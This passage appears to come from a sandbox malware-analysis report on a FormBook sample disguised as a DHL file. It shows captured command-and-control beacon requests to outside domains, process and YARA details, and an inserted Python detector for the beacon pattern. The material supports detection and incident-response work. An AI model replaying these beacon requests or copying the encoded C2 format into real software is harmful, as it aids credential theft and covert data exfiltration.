                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                    Session ID: 21 | Source: 192.168.2.5:49997 | Destination: 217.196.55.202:80 | PID: 3724 | Process: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 7, 2025 15:35:27.693969965 CET | 789 | OUT | POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.empowermedeco.com
                                                                                    Origin: http://www.empowermedeco.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 206
                                                                                    Referer: http://www.empowermedeco.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 4d 30 71 68 75 2f 53 71 4b 4c 44 43 47 38 4e 50 79 48 34 57 42 74 34 68 7a 43 79 55 71 71 52 6a 37 71 63 30 57 30 3d
                                                                                    Data Ascii: FPJps=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0JuM0qhu/SqKLDCG8NPyH4WBt4hzCyUqqRj7qc0W0=
                                                                                    Jan 7, 2025 15:35:28.277826071 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    content-type: text/html
                                                                                    content-length: 795
                                                                                    date: Tue, 07 Jan 2025 14:35:28 GMT
                                                                                    server: LiteSpeed
                                                                                    location: https://www.empowermedeco.com/fo8o/
                                                                                    platform: hostinger
                                                                                    panel: hpanel
                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                    Session ID: 22 | Source: 192.168.2.5:49998 | Destination: 217.196.55.202:80 | PID: 3724 | Process: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 7, 2025 15:35:30.222574949 CET | 809 | OUT | POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.empowermedeco.com
                                                                                    Origin: http://www.empowermedeco.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 226
                                                                                    Referer: http://www.empowermedeco.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 42 41 78 67 4b 46 46 61 4c 34 35 59 36 73 71 42 6a 43 35 30 6a 4c 41 61 59 62 59 48 4c 72 6a 6c 56 48 6b 36 30 65
                                                                                    Data Ascii: FPJps=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhBAxgKFFaL45Y6sqBjC50jLAaYbYHLrjlVHk60e
                                                                                    Jan 7, 2025 15:35:30.787947893 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    content-type: text/html
                                                                                    content-length: 795
                                                                                    date: Tue, 07 Jan 2025 14:35:30 GMT
                                                                                    server: LiteSpeed
                                                                                    location: https://www.empowermedeco.com/fo8o/
                                                                                    platform: hostinger
                                                                                    panel: hpanel
                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                    Session ID: 23 | Source: 192.168.2.5:49999 | Destination: 217.196.55.202:80 | PID: 3724 | Process: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 7, 2025 15:35:32.753498077 CET | 1826 | OUT | POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.empowermedeco.com
                                                                                    Origin: http://www.empowermedeco.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 1242
                                                                                    Referer: http://www.empowermedeco.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 54 6b 50 42 6f 68 4a 7a 66 57 5a 6e 4e 6e 31 33 44 6b 46 66 7a 44 2f 49 65 45 6e 42 33 32 7a 51 2f 57 4b 65 45 72 65 54 79 34 78 6b 73 63 6f 4b 41 54 48 37 53 44 6c 42 70 58 2b 39 48 73 46 75 43 6e 4a 53 48 68 41 67 54 68 49 79 76 52 2b 42 47 43 61 64 30 75 4c 6f 70 32 6c 41 6f 34 6d 4f 65 5a 6a 43 72 67 79 71 76 4c 71 5a 7a 4f 30 4f 5a 6e 37 68 75 35 4b 34 66 37 2f 45 38 33 6d 73 46 76 45 61 79 51 6b 63 48 4c 39 78 42 44 7a 54 6a 52 77 43 4a 62 76 47 36 55 67 47 4c 4c 38 30 33 65 [TRUNCATED]
                                                                                    Data Ascii: FPJps=[TRUNCATED]
                                                                                    Jan 7, 2025 15:35:33.330490112 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    content-type: text/html
                                                                                    content-length: 795
                                                                                    date: Tue, 07 Jan 2025 14:35:33 GMT
                                                                                    server: LiteSpeed
                                                                                    location: https://www.empowermedeco.com/fo8o/
                                                                                    platform: hostinger
                                                                                    panel: hpanel
                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
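
The sessions above share one beacon shape regardless of which C2 domain answered: a POST (and, once per host, a GET) to /fo8o/ carrying a single form field FPJps with a base64-looking value, the same legacy Internet Explorer 8 User-Agent on every request, Connection: close, and Origin/Referer headers that point back at the target host itself, repeated first against www.elettrosistemista.zip and then against www.empowermedeco.com. The following Python is an added detection example written for this report; it is not Joe Sandbox or FormBook code. It re-parses requests reconstructed from sessions 18, 21 and 24 (headers in the captured order, bodies and GET line copied from the capture) plus one constructed benign login POST for contrast, and scores each request on those features before correlating path and field name across hosts. The indicator names, the minimum base64 length, the two-host threshold and the benign request are assumptions of the example, not values from the report.

```python
"""Heuristic detector for the beacon shape in the HTTP sessions captured above.
Added example for this report, not code from Joe Sandbox or from the sample;
indicator names, MIN_B64_LEN, MIN_HOSTS and the benign request are assumptions."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# User-Agent exactly as it appears in every captured request above.
IE8_UA = ("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; "
          ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
          "Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)")
PATH_RE = re.compile(r"^/[a-z0-9]{2,8}/$")      # short directory path such as /fo8o/
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")   # base64 alphabet, optional padding
MIN_B64_LEN = 40  # assumption: shorter values are too common in benign forms
MIN_HOSTS = 2     # assumption: same path+field on two hosts is the strong signal


def split_form(s):
    """Split k=v&k=v WITHOUT plus/percent decoding: the payloads above carry literal
    '+' and '/' as base64 alphabet, which parse_qsl would turn into spaces."""
    return dict(pair.partition("=")[::2] for pair in s.split("&") if pair)

def parse_request(raw):
    """Raw HTTP/1.1 request (CRLF or LF) -> dict; params is the GET query or POST form body."""
    head, _, body = raw.strip("\n").replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (line.partition(":") for line in lines[1:])}
    url = urlsplit(target)
    form = method == "POST" and headers.get("content-type") == "application/x-www-form-urlencoded"
    return {"method": method, "path": url.path, "headers": headers,
            "params": split_form(body.strip() if form else url.query)}

def payload_field(req):
    """(name, value) of the single base64-looking field, or None unless exactly one."""
    hits = [(k, v) for k, v in req["params"].items()
            if len(v) >= MIN_B64_LEN and B64_RE.match(v)]
    return hits[0] if len(hits) == 1 else None

def indicators(req):
    """Per-request indicators taken from the header and payload shape seen above."""
    h, found = req["headers"], set()
    if PATH_RE.match(req["path"]):
        found.add("short-dir-path")
    if h.get("user-agent") == IE8_UA:
        found.add("fixed-ie8-ua")
    if h.get("connection", "").lower() == "close":
        found.add("connection-close")
    host = h.get("host")
    if host and "origin" in h and "referer" in h:
        o, r = urlsplit(h["origin"]), urlsplit(h["referer"])
        if o.hostname == host and r.hostname == host and r.path == req["path"]:
            found.add("self-referencing-origin-referer")  # Referer is the POST target itself
    if payload_field(req):
        found.add("single-base64-field")
    return found

def correlate(reqs):
    """(path, field) pairs seen with >= MIN_HOSTS distinct Host values, i.e. one beacon
    shape re-used across unrelated domains, as /fo8o/ + FPJps is above."""
    groups = defaultdict(set)
    for r in reqs:
        pf = payload_field(r)
        if pf and r["headers"].get("host"):
            groups[(r["path"], pf[0])].add(r["headers"]["host"])
    return {k: v for k, v in groups.items() if len(v) >= MIN_HOSTS}

def verdict(reqs, min_indicators=4):
    """Requests tripping at least min_indicators, plus the cross-host groups."""
    flagged = []
    for r in reqs:
        found = indicators(r)
        if len(found) >= min_indicators:
            flagged.append((r["headers"].get("host"), r["path"], found))
    return flagged, correlate(reqs)

def beacon_post(host, body):
    """Raw POST in exactly the header order captured in sessions 18 and 21 above."""
    return ("POST /fo8o/ HTTP/1.1\n"
            "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n"
            "Accept-Language: en-US,en\nAccept-Encoding: gzip, deflate, br\n"
            f"Host: {host}\nOrigin: http://{host}\nCache-Control: no-cache\nConnection: close\n"
            f"Content-Type: application/x-www-form-urlencoded\nContent-Length: {len(body)}\n"
            f"Referer: http://{host}/fo8o/\nUser-Agent: {IE8_UA}\n\n{body}\n")

# Bodies and the GET line are copied from sessions 18, 21 and 24 above; the last
# request is a constructed benign browser login, included for contrast.
SAMPLES = [
    beacon_post("www.elettrosistemista.zip", "FPJps=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6QxnGtaE0IPmb6pL6FJQ9lbnto8j6abTEyoqtnBRw"),
    beacon_post("www.empowermedeco.com", "FPJps=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0JuM0qhu/SqKLDCG8NPyH4WBt4hzCyUqqRj7qc0W0="),
    "GET /fo8o/?FPJps=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&vVyTz=x4ZDmHH0 HTTP/1.1\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n"
    "Accept-Language: en-US,en\nHost: www.empowermedeco.com\nConnection: close\n"
    f"User-Agent: {IE8_UA}\n",
    "POST /account/login HTTP/1.1\nHost: shop.example.com\nOrigin: https://shop.example.com\n"
    "Referer: https://shop.example.com/account/\nConnection: keep-alive\n"
    "Content-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 Chrome/120.0\n\n"
    "username=alice&password=Correct%20Horse&remember=1\n",
]

if __name__ == "__main__":
    flagged, groups = verdict([parse_request(s) for s in SAMPLES])
    for host, path, found in flagged:
        print(f"{host}{path}: {sorted(found)}")
    for (path, field), hosts in groups.items():
        print(f"cross-host beacon: {path} field {field} on {sorted(hosts)}")
```

The cross-host correlation is the indicator that survives domain rotation: each host on its own only returned 404 or 301, which tells the analyst nothing about the implant, but the identical path and field name on both is what ties the sessions to one beacon. The per-request indicators (Connection: close, the IE8 User-Agent, a self-referencing Referer) are each weak alone and common enough in legacy traffic that they belong in a score, not in a standalone alert; the benign login request scores zero on every one of them.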


                                                                                    Session ID:24
                                                                                    Source IP:192.168.2.5
                                                                                    Source Port:50000
                                                                                    Destination IP:217.196.55.202
                                                                                    Destination Port:80
                                                                                    PID:3724
                                                                                    Process:C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    Timestamp:Jan 7, 2025 15:35:35.285566092 CET
                                                                                    Bytes transferred:522
                                                                                    Direction:OUT
                                                                                    Data:GET /fo8o/?FPJps=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&vVyTz=x4ZDmHH0 HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.empowermedeco.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Timestamp:Jan 7, 2025 15:35:35.872658014 CET
                                                                                    Bytes transferred:1236
                                                                                    Direction:IN
                                                                                    Data:HTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    content-type: text/html
                                                                                    content-length: 795
                                                                                    date: Tue, 07 Jan 2025 14:35:35 GMT
                                                                                    server: LiteSpeed
                                                                                    location: https://www.empowermedeco.com/fo8o/?FPJps=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&vVyTz=x4ZDmHH0
                                                                                    platform: hostinger
                                                                                    panel: hpanel
                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></htm
                                                                                    Timestamp:Jan 7, 2025 15:35:35.872692108 CET
                                                                                    Bytes transferred:3
                                                                                    Direction:IN
                                                                                    Data Raw: 6c 3e 0a
                                                                                    Data Ascii: l>



                                                                                    Target ID:0
                                                                                    Start time:09:31:54
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Users\user\Desktop\rDHL8350232025-2.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\rDHL8350232025-2.exe"
                                                                                    Imagebase:0x30000
                                                                                    File size:1'563'136 bytes
                                                                                    MD5 hash:6F732C7020A0EBA292610A19133B3178
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:09:31:55
                                                                                    Start date:07/01/2025
                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\rDHL8350232025-2.exe"
                                                                                    Imagebase:0xf80000
                                                                                    File size:46'504 bytes
                                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2148926419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2148926419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2149589488.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
